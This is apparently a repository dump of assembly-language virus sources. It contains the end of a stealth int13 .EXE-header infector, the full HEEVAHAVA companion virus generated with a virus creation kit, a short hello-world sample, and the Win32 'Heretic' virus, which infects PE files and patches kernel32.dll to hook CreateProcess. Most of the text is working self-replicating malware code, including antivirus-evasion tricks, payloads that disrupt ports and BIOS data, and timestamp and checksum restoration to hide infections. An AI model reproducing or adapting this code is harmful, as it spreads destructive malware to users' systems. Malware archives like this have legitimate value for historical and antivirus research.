cmp ah,03 ;write operation?
je write ;if so, jump to write routine
cmp ah,02 ;read operation?
jne chain_old_int13 ;if not, exit
read:
pushf
call far cs:[offset old13+res_offset] ;call int13 (read sector)
jc exit_int13 ;if flag=fail, exit
mov si,'ZM' ;bytes indicating .EXE header
cmp [bx],si ;.EXE header?
jne exit_fail ;if not, exit
cmp [bx+014],setver_tag ;is this SETVER's header?
je exit_fail ;if so, exit
cmp [bx+0a0],infect_tag ;already infected?
je disinfect ;if so, jump to stealth routine
push ds ;preserve ds
xor di,di ;set di to virus destination
mov ds,di ;set ds to point to INT vector table
cmp byte ptr [040*4+3],0f0 ;int40 still pointing at ROM?
pop ds ;restore ds
jb exit_fail ;if not pointing at ROM, A-V monitor
; present, so exit
push cx ;preserve cx
call infect ;infect header in buffer
pop cx ;restore cx
jc exit_fail ;if flag=fail, exit
mov ax,0301 ;write infected header buffer
pushf
call far cs:[offset old13+res_offset] ;do it (call original int13)
disinfect:
lea si,[bx+offset old_header-com_offset] ;set source for code
lea di,[bx+06] ;set destination
mov cx,old_code_length ;set length of old code to restore
cld ;move direction=forward
rep movsb ;restore original code to header
xor al,al ;set al=0
mov cx,viruslength+old_code_length ;set # bytes to overwrite
lea di,[bx+0a0] ;set destination for writes
rep stosb ;overwrite viral code with zeros
exit_fail:
clc ;clear carry to hide any I/O errors
exit_int13:
pop ds ;restore registers
pop di
pop si
pop cx
retf 02 ;return to calling program
tbdriver_vector_area:
db '=HeaderBug=' ;space filler for TBDriver vector
write:
mov si,'ZM' ;bytes indicating .EXE header
cmp [bx],si ;.EXE header?
jne chain_old_int13 ;if not, exit
cmp [bx+014],setver_tag ;is this SETVER's header?
je chain_old_int13 ;if so, exit
push ax ;preserve ax
call infect ;infect header in buffer
pop ax ;restore ax
chain_old_int13:
pop ds ;restore registers
pop di
pop si
pop cx
db 0ea ;"jump far"
old13:
dw 02 dup ? ; to address of orig. int13 routine
infect:
lea si,[bx+0a0] ;set si=source offset for virus code
zero_test:
mov cx,viruslength+old_code_length ;set scan count to virus length
cld ;set direction of scan=forward
test_byte:
lodsb ;load a byte from area to be scanned
or al,al ;check for zero
loopz test_byte ;if zero, check next byte
or cx,cx ;counted down to zero w/o prior exit?
jz infect_OK ;if so, area is clear to infect
stc ;set "clear-to-infect" flag
ret ;return to calling routine
infect_OK:
inc ah ;increment ah
jz exit_infect ;true if calling routine=header_entry
mov cl,old_code_length ;length of old header code to preserve
lea si,[bx+06] ;set source for old code
lea di,[bx+offset old_header-com_offset] ;set storage destination
rep movsb ;store old code in virus
xor ax,ax ;set ax=0
lea di,[bx+014] ;set destination to cs:ip location
stosw ;set cs:ip values in header to 0:0
stosw ; by storing zeros in their locations
lea di,[bx+06] ;set destination to # of reloc. items
stosw ;set # of relocation items to zero
mov al,0a ;set header size value to 0ah to
stosw ; place entry point at start of virus
mov si,start_offset ;set si=start offset of virus
lea di,[bx+0a0] ;set di=destination offset in buffer
move_it:
push ds ;preserve ds
push cs
pop ds ;set ds=cs
mov cx,viruslength ;set cx move count to length of virus
cld ;set direction of move to forward
rep movsb ;move virus to header in buffer
pop ds ;restore ds
exit_infect:
clc ;clear flag to hide any I/O errors
ret ;return to calling routine
old_header:
db old_code_length dup ? ;storage area for original header
; contents
dummy_bytes:
db 0220a dup ? ;dummy bytes used to increase dropper
; length to avoid detection by f-prot
MSDOS/H-Index/Virus.MSDOS.Unknown.heevahav.asm
+296
View File
@@ -0,0 +1,296 @@
; HEEVAHAV.ASM -- HEEVAHAVA VIRUS
; Created with Nowhere Man's Virus Creation Laboratory v1.00/TASM
; Written by URNST KOUCH
; This is a spawning virus I decided to take to the limit,
; to step on the accelerator of the VCL, so to speak.
; HEEVAHAVA virus is a 'companion' .EXE infector which will attempt
; to infect almost 20 files anywhere on the disk every run. It will mess
; with low RAM, beep the speaker, disable COM port 1, entangle LPT1 and LPT2,
; nullify print screen and finally, when the disk is completely saturated
; with HEEVAHAVA virus it will display the msg, "Only heeva-hava's get stuck
; with the HEEVAHAVA virus!" Note: a 'heevahava' is a Pennsylvania
; Dutch pejorative. Colloquially, it was the name given to the farmhand
; given the job of holding the bull's pecker while semen was collected.
virus_type equ 2 ; Spawning Virus
is_encrypted equ 0 ; We're not encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
start label near
main proc near
mov ah,04Ah ; DOS resize memory function
mov bx,[finish - start / 0282h] ; BX holds # of para.
int 21h
mov sp,(finish - start) + 01100h ; Change top of stack
mov si,offset spawn_name ; SI points to true filename
int 02Eh ; DOS execution back-door
push ax ; Save return value for later
mov ax,cs ; AX holds code segment
mov ds,ax ; Restore data segment
mov es,ax ; Restore extra segment
mov cx,0013h ; Do 19 infections
search_loop: push cx ; Save CX
call search_files ; Find and infect a file
pop cx ; Restore CX
loop search_loop ; Repeat until CX is 0
mov dx,0064h ; First argument is 100
push es ; Save ES
mov ax,040h ; Set extra segment to 040h
mov es,ax ; (ROM BIOS)
mov word ptr es:[013h],dx ; Store new RAM ammount
pop es ; Restore ES
mov cx,0005h ; First argument is 5
jcxz beep_end ; Exit if there are no beeps
mov ax,0E07h ; BIOS display char., BEL
beep_loop: int 010h ; Beep
loop beep_loop ; Beep until --CX = 0
beep_end:
push es ; Save ES
mov ax,050h ; Set the extra segement to
mov es,ax ; the BIOS area
mov byte ptr [0000h],1 ; Set print screen flag to
pop es ; "printing," restore ES
mov si,0001h ; First argument is 1
push es ; Save ES
xor ax,ax ; Set the extra segment to
mov es,ax ; zero (ROM BIOS)
shl si,1 ; Convert to word index
mov word ptr [si + 03FEh],0 ; Zero COM port address
pop es ; Restore ES
mov bx,0001h ; First argument is 1
mov si,0002h ; Second argument is 2
push es ; Save ES
xor ax,ax ; Set the extra segment to
mov es,ax ; zero (ROM BIOS)
shl bx,1 ; Convert to word index
shl si,1 ; Convert to word index
mov ax,word ptr [bx + 0407h]; Zero COM port address
xchg word ptr [si + 0407h],ax; Put first value in second,
mov word ptr [bx + 0407h],ax; and second value in first!
pop es ; Restore ES
call infected_all
or ax,ax ; Did the function return zero?
je strt00 ; If equal, do effect
jmp end00 ; Otherwise skip over it
strt00: mov si,offset data00 ; SI points to data
mov ah,0Eh ; BIOS display char. function
display_loop: lodsb ; Load the next char. into AL
or al,al ; Is the character a null?
je disp_strnend ; If it is, exit
int 010h ; BIOS video interrupt
jmp short display_loop ; Do the next character
disp_strnend:
end00: pop ax ; AL holds return value
mov ah,04Ch ; DOS terminate function
int 021h
main endp
search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,64 ; Allocate 64 bytes on stack
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 64] ; SI points to 64-byte buffer
int 021h
mov ah,03Bh ; DOS change directory function
mov dx,offset root ; DX points to root directory
int 021h
call traverse ; Start the traversal
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 64] ; DX points to old directory
int 021h
mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
root db "\",0 ; Root directory
search_files endp
traverse proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first function
mov cx,00010000b ; CX holds search attributes
mov dx,offset all_files ; DX points to "*.*"
int 021h
jc leave_traverse ; Leave if no files present
check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
jne another_dir ; If not, try again
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
je another_dir ;If so, keep going
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 98] ; DX points to new directory
int 021h
call traverse ; Recursively call ourself
pushf ; Save the flags
mov ah,03Bh ; DOS change directory function
mov dx,offset up_dir ; DX points to parent directory
int 021h
popf ; Restore the flags
jnc done_searching ; If we infected then exit
another_dir: mov ah,04Fh ; DOS find next function
int 021h
jnc check_dir ; If found check the file
leave_traverse:
mov dx,offset exe_mask ; DX points to "*.EXE"
call find_files ; Try to infect a file
done_searching: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
up_dir db "..",0 ; Parent directory name
all_files db "*.*",0 ; Directories to search for
exe_mask db "*.EXE",0 ; Mask for all .EXE files
traverse endp
find_files proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file
done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_files endp
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov di,bx ; DI points to the DTA
lea si,[di + 01Eh] ; SI points to file name
mov dx,si ; DX points to file name, too
mov di,offset spawn_name + 1; DI points to new name
xor ah,ah ; AH holds character count
transfer_loop: lodsb ; Load a character
or al,al ; Is it a NULL?
je transfer_end ; If so then leave the loop
inc ah ; Add one to the character count
stosb ; Save the byte in the buffer
jmp short transfer_loop ; Repeat the loop
transfer_end: mov byte ptr [spawn_name],ah; First byte holds char. count
mov byte ptr [di],13 ; Make CR the final character
mov di,dx ; DI points to file name
xor ch,ch ;
mov cl,ah ; CX holds length of filename
mov al,'.' ; AL holds char. to search for
repne scasb ; Search for a dot in the name
mov word ptr [di],'OC' ; Store "CO" as first two bytes
mov byte ptr [di + 2],'M' ; Store "M" to make "COM"
mov byte ptr [set_carry],0 ; Assume we'll fail
mov ax,03D00h ; DOS open file function, r/o
int 021h
jnc infection_done ; File already exists, so leave
mov byte ptr [set_carry],1 ; Success -- the file is OK
mov ah,03Ch ; DOS create file function
mov cx,00100111b ; CX holds file attributes (all)
int 021h
xchg bx,ax ; BX holds file handle
mov ah,040h ; DOS write to file function
mov cx,finish - start ; CX holds virus length
mov dx,offset start ; DX points to start of virus
int 021h
mov ah,03Eh ; DOS close file function
int 021h
infection_done: cmp byte ptr [set_carry],1 ; Set carry flag if failed
ret ; Return to caller
spawn_name db 12,12 dup (?),13 ; Name for next spawn
set_carry db ? ; Set-carry-on-exit flag
infect_file endp
infected_all proc near
#if virus_type eq 0
mov al,byte ptr [di + set_carry]
else
mov al,byte ptr [set_carry] ; AX holds success value
#endif
cbw ; Sign-extend AL into AX
ret ; Return to caller
infected_all endp
data00 db 7,7,7,7,"Only heeva-hava's get stuck with THE HEEVAHAVA virus!",13,10,0
vcl_marker db "HEEVA[VCL]",0 ; VCL creation marker
finish label near
code ends
end main
MSDOS/H-Index/Virus.MSDOS.Unknown.hello.asm
+10
View File
@@ -0,0 +1,10 @@
; +-------------------------------------------------------------+ ;
; | Sample hello world program for use with the Magic Assembler | ;
; +-------------------------------------------------------------+ ;
mov ah,09
mov dx,offset(hello)
int 21
mov ax,4c00
int 20
hello db 'Hello, world!$'
MSDOS/H-Index/Virus.MSDOS.Unknown.heretic.asm
+882
View File
@@ -0,0 +1,882 @@
;
; SYNOPSIS
;
; Heretic - A Microsoft Windows 32 virus
;
; AUTHOR
;
; Memory Lapse, [NOP]
; formerly of Phalcon/Skism
;
; ABSTRACT
;
; This virus works under all beta versions of Windows 9x, and Windows NT 4.0.
; Under a Win32s environment, the virus will fail since the kernel doesn't
; physically export any useable API. Parsing the import table of the host image
; for GetProcAddress and GetModuleHandle should do the trick.
;
; NOTES
;
; Finally after seven months (including a four month hiatus for university),
; I've finally finished this virus.
;
; Ideally when the kernel is infected, the object the virus extends
; (typically .reloc) should have its flags with IMAGE_SCN_MEM_WRITE turned off.
; This will prevent in-memory patching by antivirus software. Heretic does
; not do this. At least not yet.
;
; Useful reading material: Microsoft Platform, SDK, and DDK Documentation
;
; Greets to priest, h8, lookout, virogen and johnny panic.
;
.386
locals
.model flat, stdcall
.code
.radix 16
include heretic.inc
CRC_POLY equ 0EDB88320
CRC_INIT equ 0FFFFFFFF
crc macro string
crcReg = CRC_INIT
irpc _x,
ctrlByte = '&_x&' xor (crcReg and 0ff)
crcReg = crcReg shr 8
rept 8
ctrlByte = (ctrlByte shr 1) xor (CRC_POLY * (ctrlByte and 1))
endm
crcReg = crcReg xor ctrlByte
endm
dd crcReg
endm
MARKER equ "DOS lives somewhere in time"
org 0
start: push L offset host - start ;location of old entry point
ddOldEntryPoint = dword ptr $ - 4
pushfd ;save state
pushad
call @@delta
@@delta:pop ebp
sub ebp,offset @@delta - start
;thanks vg!
db 81,0edh ;sub ebp,unsignedlong
ddEntryPoint dd 0
add [esp+24],ebp ;return address of host
mov edi,[esp+28] ;get a "random" pointer from stack
and edi,0FFFF0000 ;mask off bottom word
call try
catch: mov esp,[esp+8] ;get pointer to our stack-based
; exception record
jmp finally ;and return to host
try: push dword ptr fs:[0] ;this is our try { } block
mov fs:[0],esp ;create stack-based exception record
.repeat
dec edi ;move back a byte
lea eax,[edi-MAGIC] ;thanks h8!
cmp [edi],eax ;match? then we've found the kernel
.until zero?
mov esi,[eax+exe_str.pe_offset]
add esi,eax ;traverse PE header and find
; Export Data Directory Table
mov ebp,[esi+pe_str.export_tbl]
add ebp,eax ;RVA -> absolute
push eax
push [ebp+edt_str.edt_ord_base]
mov ebx,[ebp+edt_str.edt_ord_rva]
mov edi,[ebp+edt_str.edt_name_rva]
mov ebp,[ebp+edt_str.edt_addr_rva]
add ebx,eax ;adjust ordinal table pointer
add edi,eax ;adjust name pointer table pointer
add ebp,eax ;adjust address pointer table pointer
push ebp ;we save these values onto the stack
push eax ; so we can free up registers
call @@delta
@@delta:pop ebp
sub ebp,offset @@delta
push ebp
; on entry:
; [esp] : delta offset
; [esp+4] : image base
; [esp+8] : address pointer table
; [esp+0c] : ordinal base
; ebx - ordinal table
; esi - pointer to our list of apis
; edi - name pointer table
lea esi,[ebp+name_ptr_api]
mov ecx,1
mov edx,(name_ptr_api_end - name_ptr_api) / 4
top: push edx
push esi
mov esi,[edi] ;calculate absolute offset of
add esi,[esp+0c] ; name pointer (image base)
mov edx,CRC_INIT
lup: lodsb
or al,al ;termination token? then quit
jz chkCRC
xor dl,al
mov al,8
.repeat ;perform CRC-32 on string
shr edx,1 ;thanks jp!
.if carry?
xor edx,CRC_POLY
.endif
dec al
.until zero?
jmp lup
chkCRC: pop esi
push edi
mov ebp,ecx
shl ebp,1 ;convert count into word index
movzx eax,word ptr [ebx+ebp] ;calculate ordinal index
sub eax,[esp+14] ;relative to ordinal base
shl eax,2 ;convert ordinal into dword index
mov ebp,eax
mov edi,[esp+10]
add eax,edi ;calculate offset
mov edi,[edi+ebp] ;RVA of API (dereference said offset)
add edi,[esp+0c] ;convert to absolute offset
mov ebp,[esp+8]
cmp edx,CRC_POLY ;CreateProcessA?
org $ - 4
crc
.if zero?
mov [ebp+lpCreateProcessA],eax ;hook it
mov [ebp+CreateProcessA],edi
.endif
cmp edx,CRC_POLY ;or CreateProcessW?
org $ - 4
crc
.if zero?
mov [ebp+lpCreateProcessW],eax ;hook it
mov [ebp+CreateProcessW],edi
.endif
cmp edx,[esi] ;or an API the virus uses?
.if zero?
mov [esi+(name_ptr_api_end - name_ptr_api)],edi
lodsd ;update pointer
dec dword ptr [esp+4] ;decrement our API count
.endif
pop edi
next: pop edx
add edi,4 ;next API
inc ecx ;remember displacement
or edx,edx ;no more names to parse?
jnz top
pop ebp ;restore delta offset
add esp,0c ;clear stack
call [ebp+GlobalAlloc], \ ;allocate memory for global structure
GMEM_FIXED, \
L size vir_str
mov edi,eax
pop [edi+vir_str.lpKernelBase]
call kernel ;attempt to infect the kernel
call [ebp+GlobalFree], \ ;release global structure resources
edi
finally:pop dword ptr fs:[0] ;this is our finally { } block
pop eax ;trash exception handler address
;low and behold, the stack is restored
popad
popfd
ret
db '[nop] 4 life.. lapse, vg and jp own you! :)'
infect: mov [edi+vir_str.ddError],TRUE ;assume an error occurred
call [ebp+GetFileAttributesA], \
[edi+vir_str.lpFileName]
mov [edi+vir_str.ddFilterAttributes],eax
inc eax
jz exit
call [ebp+SetFileAttributesA], \ ;strip file attributes
[edi+vir_str.lpFileName], \
FILE_ATTRIBUTE_NORMAL
or eax,eax ;error? possibly a r/o disk?
jz exit
call [ebp+CreateFileA], \
[edi+vir_str.lpFileName], \
GENERIC_READ or GENERIC_WRITE, \
FILE_SHARE_NOTSHARED, \
NULL, \
OPEN_EXISTING, \
FILE_ATTRIBUTE_NORMAL, \
NULL
mov [edi+vir_str.hFile],eax ;if we don't get a valid file
inc eax ;descriptor (ie. an invalid handle),
jz exitChmod ;quit processing
lea eax,[edi+vir_str.ddLastWriteTime]
lea ecx,[edi+vir_str.ddLastAccessTime]
lea edx,[edi+vir_str.ddCreationTime]
call [ebp+GetFileTime], \ ;save file timestamps
[edi+vir_str.hFile], \
edx, \
ecx, \
eax
call [ebp+CreateFileMappingA], \ ;create a mmap object
[edi+vir_str.hFile], \
NULL, \
PAGE_READONLY, \
L 0, \
L 0, \
NULL
or eax,eax
jz exitTime
mov [edi+vir_str.hFileMappingObject],eax
call [ebp+MapViewOfFile], \ ;view the file in our address space
[edi+vir_str.hFileMappingObject], \
FILE_MAP_READ, \
L 0, \
L 0, \
L 0
or eax,eax
jz exitCloseMap
mov [edi+lpBaseAddress],eax
cmp word ptr [eax],IMAGE_DOS_SIGNATURE
jnz exitUnmap ;some sort of executable?
mov esi,eax
add esi,[eax+exe_str.pe_offset] ;seek to NT header
push eax
call [ebp+IsBadCodePtr], \ ;can we read the memory at least?
esi ;potentially not a Windows file?
or eax,eax
pop eax
jnz exitUnmap
cmp dword ptr [esi],IMAGE_NT_SIGNATURE
jnz exitUnmap ;PE file?
cmp [esi+pe_str.timestamp],CRC_POLY
org $ - 4
crc MARKER
jz exitUnmap
lea eax,[ebp+infectKernel]
cmp [edi+vir_str.lpInfectMethod],eax;attempting to infect KERNEL32.DLL?
.if !zero?
test [esi+pe_str.flags],IMAGE_FILE_DLL
jnz exitUnmap ;and not a runtime library?
.endif
call getLastObjectTable
mov eax,[ebx+obj_str.obj_psize]
add eax,[ebx+obj_str.obj_poffset]
add eax,(_end - start) ;calculate maximum infected file size
mov ecx,[esi+pe_str.align_file]
call align
mov [edi+vir_str.ddFileSizeInfected],eax
call [ebp+UnmapViewOfFile], \
[edi+vir_str.lpBaseAddress]
call [ebp+CloseHandle], \
[edi+vir_str.hFileMappingObject]
call [ebp+CreateFileMappingA], \ ;reopen and extend mmap file
[edi+vir_str.hFile], \
NULL, \
PAGE_READWRITE, \
L 0, \
[edi+vir_str.ddFileSizeInfected], \
NULL
mov [edi+vir_str.hFileMappingObject],eax
call [ebp+MapViewOfFile], \
[edi+vir_str.hFileMappingObject], \
FILE_MAP_WRITE, \
L 0, \
L 0, \
L 0
mov [edi+vir_str.lpBaseAddress],eax
add eax,[eax+exe_str.pe_offset]
mov esi,eax
call getLastObjectTable
mov eax,[ebx+obj_str.obj_rva] ;set new entry point if an EXE
add eax,[ebx+obj_str.obj_psize] ; or set hooks if kernel32.dll
call [edi+vir_str.lpInfectMethod]
push edi
push esi
mov edi,[edi+vir_str.lpBaseAddress]
add edi,[ebx+obj_str.obj_poffset]
add edi,[ebx+obj_str.obj_psize]
lea esi,[ebp+start]
mov ecx,(_end - start)
cld
rep movsb ;copy virus
pop esi
pop eax
xchg eax,edi
sub eax,[edi+vir_str.lpBaseAddress] ;new psize = old psize + (_end - start)
sub eax,[ebx+obj_str.obj_poffset]
mov ecx,[esi+pe_str.align_file]
call align ;calculate new physical size
mov [ebx+obj_str.obj_psize],eax
mov eax,[ebx+obj_str.obj_vsize]
add eax,(_end - start)
mov ecx,[esi+pe_str.align_obj]
call align ;calculate potential new virtual size
cmp eax,[ebx+obj_str.obj_psize] ;if new physical size > new virtual size
.if carry?
mov eax,[ebx+obj_str.obj_psize] ;then let the virtual size = physical size
.endif
mov [ebx+obj_str.obj_vsize],eax
add eax,[ebx+obj_str.obj_rva]
cmp eax,[esi+pe_str.size_image] ;infected host increased in image size?
.if !carry?
mov [esi+pe_str.size_image],eax
.endif
mov [esi+pe_str.timestamp],CRC_POLY
org $ - 4
crc MARKER
or [ebx+obj_str.obj_flags],IMAGE_SCN_CNT_INITIALIZED_DATA or IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE
lea eax,[ebp+szImageHlp]
call [ebp+LoadLibraryA], \ ;load image manipulation library
eax
or eax,eax
.if !zero?
push eax ;(*) argument for FreeLibrary()
lea ecx,[ebp+szChecksumMappedFile]
call [ebp+GetProcAddress], \ ;get address of image checksum api
eax, \
ecx
or eax,eax
.if !zero?
lea ecx,[esi+pe_str.pe_cksum]
lea edx,[edi+vir_str.ddBytes]
call eax, \ ;calculate checksum
[edi+vir_str.lpBaseAddress], \
[edi+vir_str.ddFileSizeInfected], \
edx, \
ecx
.endif
call [ebp+FreeLibrary] ;argument is set at (*)
.endif
mov [edi+vir_str.ddError],FALSE ;no errors!
exitUnmap:
call [ebp+UnmapViewOfFile], \ ;unmap the view
[edi+vir_str.lpBaseAddress]
exitCloseMap:
call [ebp+CloseHandle], \ ;remove mmap from our address space
[edi+vir_str.hFileMappingObject]
exitTime:
lea eax,[edi+vir_str.ddLastWriteTime]
lea ecx,[edi+vir_str.ddLastAccessTime]
lea edx,[edi+vir_str.ddCreationTime]
call [ebp+SetFileTime], \ ;restore file time
[edi+vir_str.hFile], \
edx, \
ecx, \
eax
call [ebp+CloseHandle], \ ;close the file
[edi+vir_str.hFile]
exitChmod:
call [ebp+SetFileAttributesA], \ ;restore file attributes
[edi+vir_str.lpFileName], \
[edi+vir_str.ddFilterAttributes]
exit: ret ;return to caller
kernel: call [ebp+GlobalAlloc], \ ;allocate memory for source buffer
GMEM_FIXED, \
_MAX_PATH
mov [edi+vir_str.lpSrcFile],eax
call [ebp+GetSystemDirectoryA], \ ;store %sysdir% in source buffer
eax, \
_MAX_PATH
call [ebp+GlobalAlloc], \ ;allocate memory for destination buffer
GMEM_FIXED, \
_MAX_PATH
mov [edi+vir_str.lpDstFile],eax
call [ebp+GetWindowsDirectoryA], \ ;store %windir% in destination buffer
eax, \
_MAX_PATH
lea eax,[ebp+szKernel]
call [ebp+lstrcatA], \ ;*lpSrcFile = %sysdir%\kernel32.dll
[edi+vir_str.lpSrcFile], \
eax
lea eax,[ebp+szKernel]
call [ebp+lstrcatA], \ ;*lpDstFile = %windir%\kernel32.dll
[edi+vir_str.lpDstFile], \
eax
call [ebp+CopyFileA], \
[edi+vir_str.lpSrcFile], \ ;%sysdir%\kernel32.dll
[edi+vir_str.lpDstFile], \ ; -> %windir%\kernel32.dll
FALSE
lea eax,[ebp+infectKernel]
mov [edi+lpInfectMethod],eax ;we're trying to infect the kernel
mov eax,[edi+vir_str.lpDstFile]
mov [edi+vir_str.lpFileName],eax
call infect
.if [edi+vir_str.ddError] == FALSE
lea eax,[ebp+szSetupApi]
call [ebp+LoadLibraryA], \
eax
or eax,eax ;if LoadLibrary fails, explicitly write
.if zero? ;to WININIT.INI (Windows 95)
lea eax,[ebp+szWinInitFile] ;delete the original kernel
push eax
push [edi+vir_str.lpSrcFile]
lea eax,[ebp+szKeyName]
push eax
lea eax,[ebp+szAppName]
push eax
call [ebp+WritePrivateProfileStringA]
lea eax,[ebp+szWinInitFile] ;move our patched kernel
push eax
push [edi+vir_str.lpDstFile]
push [edi+vir_str.lpSrcFile]
lea eax,[ebp+szAppName]
push eax
call [ebp+WritePrivateProfileStringA]
.else
push eax ;(*) argument for FreeLibrary
lea ebx,[ebp+szSetupInstallFileExA] ;fetch address of API from this DLL
call [ebp+GetProcAddress], \
eax, \
ebx
or eax,eax
.if !zero?
lea ebx,[edi+ddBytes]
call eax, \ ;move patched kernel
NULL, \ ;NT->delay until next reboot
NULL, \ ; modified MoveFileEx behaviour?
[edi+vir_str.lpDstFile], \ ;98->WININIT.INI
NULL, \
[edi+vir_str.lpSrcFile], \
SP_COPY_SOURCE_ABSOLUTE or SP_COPY_DELETESOURCE, \
NULL, \
NULL, \
ebx
.endif
mov esi,eax
call [ebp+FreeLibrary]
mov eax,esi
.endif
or eax,eax
.if zero?
mov [edi+vir_str.ddError],TRUE
.endif
.endif
.if [edi+vir_str.ddError] == TRUE
call [ebp+DeleteFileA], \ ;delete %windir%\kernel32.dll if
[edi+vir_str.lpFileName] ; an error infecting or moving
.endif
call [ebp+GlobalFree], \ ;deallocate destination buffer
[edi+vir_str.lpDstFile]
call [ebp+GlobalFree], \ ;deallocate source buffer
[edi+vir_str.lpSrcFile]
ret
infectKernel:
xchg eax,ecx
movzx eax,[esi+pe_str.size_NThdr]
add eax,esi
add eax,offset pe_str.majik
mov edx,0
lpCreateProcessA = dword ptr $ - 4
sub edx,[edi+vir_str.lpKernelBase]
@@lup: cmp [eax+obj_str.obj_rva],edx ;was the API in the previous object?
ja @@next
add eax,size obj_str ;next object
jmp @@lup
@@next: sub eax,size obj_str ;seek back to export object
push L offset hookCreateProcessA - start
call trapAPI
mov edx,0
lpCreateProcessW = dword ptr $ - 4
sub edx,[edi+vir_str.lpKernelBase]
push L offset hookCreateProcessW - start
call trapAPI
ret
infectEXE:
mov [ebp+ddEntryPoint],eax
xchg eax,[esi+pe_str.rva_entry]
mov [ebp+ddOldEntryPoint],eax
ret
trapAPI:push ebx
push ecx
mov ebx,[eax+obj_str.obj_poffset]
sub ebx,[eax+obj_str.obj_rva]
add ebx,[edi+vir_str.lpBaseAddress]
add ebx,edx
add ecx,[esp+0c]
mov [ebx],ecx
pop ecx
pop ebx
ret 4
align: xor edx,edx
add eax,ecx
dec eax
div ecx
mul ecx
ret
getLastObjectTable:
movzx eax,[esi+pe_str.num_obj]
cdq
mov ecx,L size obj_str
dec eax
mul ecx
movzx edx,[esi+pe_str.size_NThdr]
add eax,edx
add eax,esi
add eax,offset pe_str.majik ;seek to last object table
xchg eax,ebx
ret
;on entry:
; [esp] : return address to caller
; [esp+4] -> [esp+28] : registers
; [esp+2c] : return address to process
; [esp+34] : commandline
hookInfectUnicode:
call @@delta
@@delta:pop ebp
sub ebp,offset @@delta
mov edi,[esp+34]
call [ebp+WideCharToMultiByte], \ ;find out how many bytes to allocate
CP_ACP, \ ; ANSI code page
L 0, \ ; no composite/unmapped characters
edi, \ ; lpWideCharStr
L -1, \ ; calculate strlen(lpWideCharStr)+1
NULL, \ ; no buffer
L 0, \ ; tell us how many bytes to allocate
NULL, \ ; ignore unmappable characters
NULL ; don't tell us about problems
or eax,eax ;no bytes can be converted?
jz hookInfectError ;then bomb out.
push eax ;(*)
call [ebp+GlobalAlloc], \ ;allocate enough memory for the
GMEM_FIXED, \ ; converted UNICODE string
eax
or eax,eax ;any memory available?
pop ecx ;(*)
jz hookInfectError
mov esi,eax
mov edi,[esp+34]
call [ebp+WideCharToMultiByte], \ ;UNICODE -> ANSI conversion
CP_ACP, \ ; ANSI code page
L 0, \ ; no composite/unmappable characters
edi, \ ; lpWideCharStr
L -1, \ ; calculate strlen(lpWideCharStr)+1
esi, \ ; destination buffer for ANSI characters
ecx, \ ; size of destination buffer
NULL, \ ; ignore unmappable characters
NULL ; don't tell us about problems
jmp hookInfectDispatch
;on entry:
; [esp] : return address to caller
; [esp+4] -> [esp+28] : registers
; [esp+2c] : return address to process
; [esp+34] : commandline
hookInfectAnsi:
call @@delta
@@delta:pop ebp
sub ebp,offset @@delta
mov edi,[esp+34] ;get the filename
call [ebp+lstrlenA], \ ;calculate string length
edi ; (not including null terminator)
or eax,eax ;zero length?
jz hookInfectError
inc eax ;include null terminator
call [ebp+GlobalAlloc], \ ;allocate some memory for the copy
GMEM_FIXED, \
eax
or eax,eax ;no memory?
jz hookInfectError
mov esi,eax
call [ebp+lstrcpyA], \ ;*edi -> *esi
esi, \
edi
hookInfectDispatch:
push esi ;(*) argument for GlobalFree
call [ebp+GlobalAlloc], \ ;instantiate our global structure
GMEM_FIXED, \
L size vir_str
or eax,eax ;fatal error if no memory
jz hookInfectErrorFree
mov edi,eax
mov [edi+vir_str.lpFileName],esi
mov [edi+vir_str.ddError],FALSE ;assume no parsing fix-ups required
lodsb
cmp al,'"'
.if zero?
mov [edi+vir_str.lpFileName],esi
mov [edi+vir_str.ddError],TRUE ;parsing fix-ups required
.endif
hookInfectParse:
lodsb ;get a byte
.if [edi+vir_str.ddError] == TRUE ;need a fix-up?
cmp al,'"' ;'"' is our terminator
jnz hookInfectParse
.else ;no fix-up required
cmp al,' ' ;' ' or \0 is our terminator
jz hookInfectParsed
or al,al
jnz hookInfectParse
.endif
hookInfectParsed:
mov byte ptr [esi-1],NULL ;null terminate string
lea eax,[ebp+infectEXE] ;we're infecting a non-kernel32 executable
mov [edi+vir_str.lpInfectMethod],eax
call infect
call [ebp+GlobalFree], \ ;deallocate global structure
edi
hookInfectErrorFree:
call [ebp+GlobalFree] ;deallocate lpFileName
hookInfectError:
ret
hookCreateProcessW:
push CRC_POLY
CreateProcessW = dword ptr $ - 4
hookUnicode:
pushfd
pushad
call hookInfectUnicode
popad
popfd
ret
hookCreateProcessA:
push CRC_POLY
CreateProcessA = dword ptr $ - 4
hookAnsi:
pushfd
